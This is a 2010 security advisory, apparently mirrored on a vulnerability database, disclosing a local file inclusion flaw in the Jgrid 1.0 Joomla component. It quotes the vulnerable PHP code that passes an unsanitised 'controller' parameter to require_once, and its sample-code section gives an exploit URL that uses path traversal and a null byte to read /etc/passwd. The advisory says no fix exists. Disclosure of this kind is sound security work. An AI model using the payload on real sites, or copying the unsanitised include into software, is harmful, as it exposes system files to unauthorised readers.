Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24542
HistoryAug 17, 2010 - 12:00 a.m.

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

2010-08-1700:00:00
vulners.com
24
JSON

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

Name Jgrid
Vendor http://datagrids.clubsareus.org
Versions Affected 1.0

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-14

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION

DATA GRID Component built on the popular EXTJS Framework.

II. DESCRIPTION

A parameter is not properly sanitised before being used
by the require_once function.

III. ANALYSIS

Summary:

A) Local File Inclusion

A) Local File Inclusion

The controller parameter in jgrid.php is not sanitised
before being used by the PHP function's require_once().
This allows a guest to include local files. The following
is the affected code:

if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

IV. SAMPLE CODE

A) Local File Inclusion

http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00

V. FIX

No fix.

JSON